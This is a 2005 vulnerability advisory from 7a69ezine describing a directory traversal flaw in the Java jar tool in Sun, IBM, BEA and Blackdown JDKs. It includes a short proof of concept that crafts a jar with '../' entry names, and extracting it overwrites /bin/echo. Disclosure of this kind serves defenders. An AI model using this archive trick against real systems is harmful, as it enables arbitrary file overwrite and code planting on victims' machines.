7a69Adv#23 - Jar tool directory transversal vulnerability
- ------------------------------------------------------------------
7a69ezine Advisories 7a69Adv#23
- ------------------------------------------------------------------
http://www.7a69ezine.org [01/04/2005]
- ------------------------------------------------------------------
Title: Jar tool directory transversal vulnerability
Author: Pluf - <pluf@xxxxxxxxxxxxx>
Remote: no
Exploit: yes
Severity: Medium-High
- ------------------------------------------------------------------
I. Introduction.
Jar is a java archiving and compression application, which is part
of many java development kits. It was desgined mainly to facilitate
the packaging of java applets or applications into a single archive.
II. Description.
The jar tool does not check properly if the files to be extracted
have the string "../" on its names, so it's possible for an attacker
to create a malicious jar file in order to overwrite arbitrary files
within the filesystem.
III. Affected Software.
The following java development kits have been tested and contain the
vulnerability, but maybe others kits and/or platforms could be affected
by the same:
* SUN:
Sun's J2SE Development Kit 1.5.0 (Solaris, Windows and Linux version)
Sun's J2SE Development Kit 1.4.2 (Solaris, Windows and Linux version)
* IBM:
IBM Java Development Kit 1.4.2 Linux
* BEA:
BEA WebLogic's J2SE Development Kit, version 1.5.0 (Linux and Windows
version)
* BLACKDOWN:
Blackdown Java Development Kit 1.4.2 Linux
IV. Exploit.
A malicious jar file can be created as follows:
java4fun# echo hi
hi
java4fun# jar cvf trash.jar *.class ..o..o..o..o..o..o..obinoecho
java4fun# ht trash.jar (change the 'o' by '/')
java4fun# jar xvf trash.jar (no overwrite message confirmation)
java4fun# echo hi
hi, you've just infected yourself!!!
V. Patch.
Not available.
Use unzip instead of jar.
VI. Timeline.
23/03/2005 Bug discovered.
28/03/2005 Mail sent to vendors.
28/03/2005 Sun response.
02/04/2005 Mail sent to vendors (second try)
09/04/2005 Advisory released
VII. Extra data
You can find more 7a69ezine advisories on this following link:
http://www.7a69ezine.org/avisos/propios [spanish info]